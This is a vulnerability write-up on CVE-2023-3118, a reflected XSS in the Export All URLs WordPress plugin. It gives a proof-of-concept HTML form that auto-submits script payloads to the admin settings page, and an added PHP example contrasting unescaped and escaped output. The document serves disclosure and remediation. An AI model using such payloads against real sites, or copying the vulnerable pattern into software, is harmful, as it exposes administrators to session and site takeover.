CVE-2023-3118 - Reflected Cross-Site Scripting Vulnerability in Export All URLs WordPress Plugin
During my recent code audit of various popular WordPress plugins, I discovered another vulnerability, this time in the Export All URLs WordPress plugin. This vulnerability, assigned CVE-2023-3118, is a reflected cross-site scripting (XSS) issue that can be exploited against high-privilege users, including administrators. This article provides detailed information about the vulnerability, its impact, and recommended actions to mitigate the risk.
The vulnerability can be triggered by making a logged-in admin user visit a page containing the following HTML code:
```html
<!-- Auto-submits a cross-site POST to the plugin's settings page on load -->
<body onload="document.forms[0].submit()">
  <form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
    <input type="hidden" name="starting-point" value='"><script>alert(/XSS-starting-point/)</script>' />
    <input type="hidden" name="ending-point" value='"><script>alert(/XSS-ending-point/)</script>' />
    <input type="submit" value="submit">
  </form>
</body>
```
To address this vulnerability, the maintainers of the Export All URLs WordPress plugin have released an updated version (4.6) that properly sanitizes and escapes user-supplied input.
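The kind of fix described above, shown as an added example that is not the plugin's actual source code: a request value reflected into an HTML attribute, first unescaped and then sanitized on input and escaped on output. The function names `render_field_vulnerable` and `render_field_hardened` are hypothetical, the field name and payload are taken from the proof of concept above, and the shims are simplified stand-ins so the file also runs under plain `php` outside WordPress.

```php
<?php
// Added illustration; NOT the Export All URLs plugin's code.
// Simplified shims (assumption: only used when WordPress is not loaded; the
// real WordPress functions perform additional checks).
if (!function_exists('esc_attr')) {
    function esc_attr($s) { return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($s) { return trim(strip_tags((string) $s)); }
}
if (!function_exists('wp_unslash')) {
    function wp_unslash($s) { return stripslashes((string) $s); }
}

// Vulnerable pattern: the submitted value is echoed straight into an
// attribute, so a leading "> closes the attribute and the tag.
function render_field_vulnerable(array $post, string $name): string {
    $value = $post[$name] ?? '';
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: sanitize when reading the request, then escape for the
// attribute context at the point of output.
function render_field_hardened(array $post, string $name): string {
    $value = isset($post[$name])
        ? sanitize_text_field(wp_unslash($post[$name]))
        : '';
    return '<input type="text" name="' . esc_attr($name)
         . '" value="' . esc_attr($value) . '">';
}

// Constructed sample input: the starting-point payload from the PoC above.
$post = array(
    'starting-point' => '"><script>alert(/XSS-starting-point/)</script>',
);

// The first line contains a live <script> element; the second keeps the
// payload inside the value attribute as inert, entity-encoded text.
echo render_field_vulnerable($post, 'starting-point'), "\n";
echo render_field_hardened($post, 'starting-point'), "\n";
```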
The reflected cross-site scripting (XSS) vulnerability exists in the Export All URLs WordPress plugin versions prior to 4.6. Users of affected versions should update to the latest version as soon as possible to protect their WordPress installations from potential exploitation.
- Export All URLs Plugin: https://wordpress.org/plugins/export-all-urls/
- CVE-2023-3118: https://nvd.nist.gov/vuln/detail/CVE-2023-3118
- WP-Scan: https://wpscan.com/vulnerability/8a9efc8d-561a-42c6-8e61-ae5c3be581ea